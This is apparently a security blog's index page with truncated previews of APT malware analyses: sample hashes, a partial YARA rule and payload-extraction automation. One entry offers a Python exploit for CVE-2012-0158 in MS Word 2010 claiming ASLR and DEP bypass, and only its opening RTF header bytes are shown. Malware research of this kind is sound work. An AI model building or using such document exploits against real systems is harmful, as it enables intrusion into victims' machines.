w@rri0r@bh@y

  1. Apt inception

    Greet: "Vinnu", "nightrover","bond"

    In December 2014 BlueCoat released a report on an APT campaign named "Inception". The spear-phishing mail was sent with an attachment under various names; we analyzed the attachment named "Car for sale.doc". The attachment was an exploit (CVE-2012-0158) with an embedded VBS and a decoy file themed as an advertisement for a used car for sale that purportedly originated from Michael Hahne, an employee at the ...

    Updated 03-23-2015 at 05:59 PM by 41.w4r10r

  2. Apt sme

    Greet : "Vinnu", "nightrover","bond"

    I have used the name "APT SME" because the payload developer used that name for his project. I have just created automation to extract the payload file from the exploit used in APT SME.

    Sample used for creating Automation:
    Md5 - 57A8DB5A5D35464BE16518332A64A992

    Shellcode:

    Code:
    ...

    Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

  3. Apt vitnam

    Greet :- "vinnu","nightrover","bond"

    I used the name "VITNAM" because the decoy file had some content from Vietnam. Here I have automated a process through which we can extract an executable from an RTF exploit.

    Yara Rule:
    Code:
    rule APT_VITNAM {
      meta:
       author = "w@rri0r@bh@y"
      strings :
       $magic = "{\\rt"
       $v0 = "eb00eb1490905e33c980368746"
    ...

    Updated 03-20-2015 at 02:35 PM by [s]

  4. Apt carbanak

    Greet : "Vinnu", "nightrover","bond"

    All the analysis was done by the "Kaspersky" company. I have just created automation to extract the payload from the exploit used in APT CARBANAK.

    Sample used for creating Automation:
    Md5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298 ...

    Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

  5. Exploit for MS WORD 2010 in Windows 7 (CVE-2012-0158)

    Exploit For MS WORD 2010
    CVE-2012-0158
    ASLR BYPASS - MSCOMCTL.OCX (non-ASLR Module)
    DEP BYPASS - Complete code in code section

    Code:
    #!/usr/bin/python
    
    import struct
    import binascii
    
    header = (
    "\x7B\x5C\x72\x74\x66\x31\x0D\x0A\x7B\x5C\x66\x6F\x6E\x74\x74\x62\x6C\x7B\x5C\x66\x30\x5C"
    "\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x20\x56\x65\x72\x64\x61\x6E\x61"
    "\x3B\x7D\x7D\x0D\x0A\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x34\x5C\x75\x63\x31\x5C\x70\x61"
    ...

    Updated 03-02-2014 at 07:55 PM by w@rri0r@bh@y
